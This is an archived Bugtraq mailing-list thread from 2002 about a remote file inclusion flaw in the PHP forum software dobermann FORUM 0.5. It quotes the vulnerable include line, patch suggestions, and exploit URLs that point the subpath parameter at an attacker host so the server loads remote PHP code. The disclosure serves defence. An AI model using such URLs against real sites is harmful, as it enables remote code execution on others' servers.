Bugtraq mailing list archives
RE: dobermann FORUM (php)
From: "Mark Stunnenberg" <marksg () chello nl>
Date: Tue, 29 Oct 2002 10:00:22 +0100
Or place a: -------------------- <? $subpath = ''; ?> -------------------- Right above the place where the actual $subpath is being set. Mark
-----Original Message----- From: Frog Man [mailto:leseulfrog () hotmail com] Sent: zondag 27 oktober 2002 P 23:53 To: bugtraq () securityfocus com Subject: dobermann FORUM (php) Informations : °°°°°°°°°°°°°° Product : dobermann FORUM version : 0.5 website : http://www.le-dobermann.com Problem : Include file PHP Code/location : °°°°°°°°°°°°°°°°°°° entete.php enteteacceuil.php topic/entete.php : ------------------------------------------ <?php @include $subpath."banniere.php"; ?> ------------------------------------------ index.php newtopic.php : ------------------------ @require "config.php"; @include("entete.php"); ------------------------ Exploits : °°°°°°°°°° http://[target]/entete.php?subpath=http://[attacker]/ http://[target]/enteteacceuil.php?subpath=http://[attacker]/ http://[target]/topic/entete.php?subpath=http://[attacker]/ http://[target]/index.php?subpath=http://[attacker]/ http://[target]/newtopic.php?subpath=http://[attacker]/ with http://[attacker]/banniere.php Patch : °°°°°°° In files : ------------------ entete.php enteteacceuil.php topic/entete.php ------------------ replace the line : ------------------------------------------ <?php @include $subpath."banniere.php"; ?> ------------------------------------------ by : ------------------------------------------ <?php $banfile=$subpath."banniere.php"; if (file_exists($banfile)){ @include $banfile; } ?> ------------------------------------------ More details in french : http://www.frog-> man.org/tutos/dobermannFORUM.txt translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-
man.org%2Ftutos%2FdobermannFORUM.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859- 1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________ MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
Current thread:
- dobermann FORUM (php) Frog Man (Oct 28)
- <Possible follow-ups>
- RE: dobermann FORUM (php) Mark Stunnenberg (Oct 29)